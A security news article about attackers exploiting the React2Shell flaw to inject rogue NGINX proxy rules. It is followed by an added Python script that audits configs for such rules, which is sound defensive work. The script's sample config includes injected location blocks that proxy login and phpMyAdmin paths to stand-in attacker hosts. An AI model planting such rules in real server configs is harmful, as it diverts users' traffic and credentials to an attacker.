Hackers are exploiting the React2Shell flaw to inject malicious NGINX configs and hijack web traffic via attacker-controlled servers.

Security researchers have uncovered an ongoing web traffic hijacking campaign targeting NGINX servers and popular hosting control panels such as Baota (BT), with the goal of rerouting legitimate traffic through attacker-controlled infrastructure.
Datadog Security Labs reported that the activity is linked to exploitation of the critical React2Shell vulnerability. The attackers abuse malicious NGINX configuration files to intercept requests and proxy them to backend systems under their control.
“The malicious configuration sits between users and legitimate websites, silently redirecting traffic,” said security researcher Ryan Simon. “The campaign primarily targets Asian country-code TLDs like .in, .id, .pe, .bd, and .th, Baota-managed Chinese hosting environments, and government and education domains such as .gov and .edu.”
The attack relies on shell scripts that inject rogue “location” blocks into NGINX, an open-source reverse proxy and load balancer. These directives capture requests sent to specific URL paths and forward them to attacker-owned domains using the proxy_pass feature.
Researchers noted that the scripts form a multi-stage toolkit designed to establish persistence and automate the deployment of malicious NGINX configurations. Key components include:
zx.sh, the main controller, which executes later stages using tools like curl or wget, or falls back to raw TCP connections if those utilities are blocked
bt.sh, which specifically targets Baota (BT) Panel environments to overwrite NGINX configuration files
4zdh.sh, which scans common NGINX config paths and reduces errors during file creation
zdh.sh, which focuses on Linux and containerized NGINX deployments, particularly those serving .in and .id domains
ok.sh, which generates reports listing all active traffic hijacking rules on the system
“The toolkit combines target discovery, persistence mechanisms, and automated creation of malicious configuration files to sustain traffic redirection,” Datadog said.
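As an added defender's example, not part of the Datadog report or its tooling, the following Python script audits NGINX configuration files for location blocks whose proxy_pass forwards to a host outside the machine or its private network, which is the pattern the injected hijack rules described above produce. The host names and the sample config are constructed for illustration.

```python
import ipaddress
import re
from pathlib import Path
from urllib.parse import urlsplit

LOCATION_RE = re.compile(r"location\s+(?:[=~*^]+\s*)?(\S+)\s*\{")
PROXY_RE = re.compile(r"proxy_pass\s+(\S+?)\s*;")
UPSTREAM_RE = re.compile(r"upstream\s+(\S+)\s*\{")

def is_external(target, upstreams):
    """True when a proxy_pass target leaves the host/LAN: not a unix socket,
    not a declared upstream name, not loopback or private address space."""
    if "unix:" in target or "$" in target:  # sockets / variables: not judged statically
        return False
    url = urlsplit(target if "://" in target else "http://" + target)
    host = url.hostname or ""
    if not host or host == "localhost" or host in upstreams:
        return False
    try:
        return not ipaddress.ip_address(host).is_private
    except ValueError:
        return True  # a DNS name that no upstream block declares

def audit_config(text):
    """Return (location, proxy_pass target) pairs that forward to external hosts."""
    upstreams = set(UPSTREAM_RE.findall(text))
    findings, location = [], "(server)"
    for raw in text.splitlines():
        line = raw.split("#", 1)[0]  # drop comments
        m = LOCATION_RE.search(line)
        if m:
            location = m.group(1)
        for target in PROXY_RE.findall(line):
            if is_external(target, upstreams):
                findings.append((location, target))
    return findings

def audit_tree(root):
    """Walk a config directory (e.g. /etc/nginx or a panel's vhost directory)."""
    return {str(p): hits for p in Path(root).rglob("*.conf")
            if (hits := audit_config(p.read_text(errors="replace")))}

# Constructed sample: three legitimate blocks followed by two injected ones.
SAMPLE_CONF = """\
upstream app { server 127.0.0.1:3000; }
server {
    listen 80;
    location / { proxy_pass http://app; }
    location /api/ { proxy_pass http://10.0.0.5:8080; }
    location /img/ { proxy_pass http://unix:/run/app.sock:/; }
    location /wp-login.php { proxy_pass http://hijack-proxy.example; }  # injected
    location ~ ^/phpmyadmin { proxy_pass https://cdn-relay.example:8443/; }  # injected
}
"""

if __name__ == "__main__":
    for loc, target in audit_config(SAMPLE_CONF):
        print(f"external proxy_pass: location {loc} -> {target}")
```

Run `audit_tree("/etc/nginx")` on a host to list every config file containing such a rule; legitimate proxying to a CDN or external API will also appear, so compare the output against a known-good baseline.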
The findings follow a GreyNoise report showing that just two IP addresses were responsible for 56% of observed React2Shell exploitation attempts two months after the vulnerability’s disclosure. Between January 26 and February 2, 2026, GreyNoise recorded exploitation activity from 1,083 unique source IPs.
According to the threat intelligence firm, the most active sources deployed different post-exploitation payloads. One delivered cryptomining software from staging servers, while the other established reverse shells back to the scanning IPs, indicating a preference for hands-on access over automated monetization.
The disclosure also comes amid a separate coordinated reconnaissance effort targeting Citrix ADC and NetScaler Gateway systems. That campaign leveraged tens of thousands of residential proxy IPs alongside a single Microsoft Azure address to identify exposed login interfaces.
“The operation ran in two modes,” GreyNoise said. “One used large-scale proxy rotation to discover login panels, while the other focused on rapid version enumeration from cloud infrastructure. Together, they point to a highly coordinated reconnaissance effort.”